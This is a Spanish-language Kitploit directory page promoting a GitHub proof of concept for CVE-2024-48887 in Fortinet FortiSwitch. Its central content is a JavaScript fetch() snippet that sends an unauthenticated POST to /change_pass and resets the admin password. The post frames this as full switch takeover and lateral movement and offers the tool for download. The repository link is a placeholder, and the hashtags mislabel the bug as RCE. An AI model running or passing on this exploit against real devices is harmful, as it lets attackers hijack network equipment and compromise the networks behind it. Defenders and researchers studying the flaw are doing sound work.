Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-48887-FortiSwitch-Exploit — un fragmento de JavaScript ligero que demuestra cómo se pueden desencadenar cambios de contraseña no autorizados en endpoints de GUI vulnerables de Fortinet FortiSwitch. | Kitploit
Herramientas/GitHubGitHub/cybersecplayground/cve-2024-48887-fortiswitch-exploit
Análisis de VulnerabilidadesExplotaciónMovimiento LateralExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubcybersecplayground/cve-2024-48887-fortiswitch-exploit

CVE-2024-48887-FortiSwitch-Exploit

un fragmento de JavaScript ligero que demuestra cómo se pueden desencadenar cambios de contraseña no autorizados en endpoints de GUI vulnerables de Fortinet FortiSwitch.

Ver Repositorio
23hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-48887-FortiSwitch-Exploit

🚨 PoC de CVE-2024-48887 para FortiSwitch (JavaScript) 🚨

🔥 Acabo de publicar un fragmento de JavaScript ligero que muestra cómo se pueden activar cambios de contraseña no autorizados en endpoints vulnerables de la GUI de Fortinet FortiSwitch.

🛠️ Acerca de la vulnerabilidad: Un atacante puede crear una simple solicitud fetch() para manipular la configuración de contraseñas sin autenticación, apuntando directamente a las variantes del endpoint /change_pass.

root@kitploit:~
fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));

💡 Impacto: toma completa del switch, potencial movimiento lateral y compromiso de la red.

📁 Repositorio: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ ¡Dale una estrella al repositorio y compártelo con tus colegas de infosec!

📢 Sigue el análisis completo y las alertas en tiempo real a través de @cybersecplayground

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

Descargar herramienta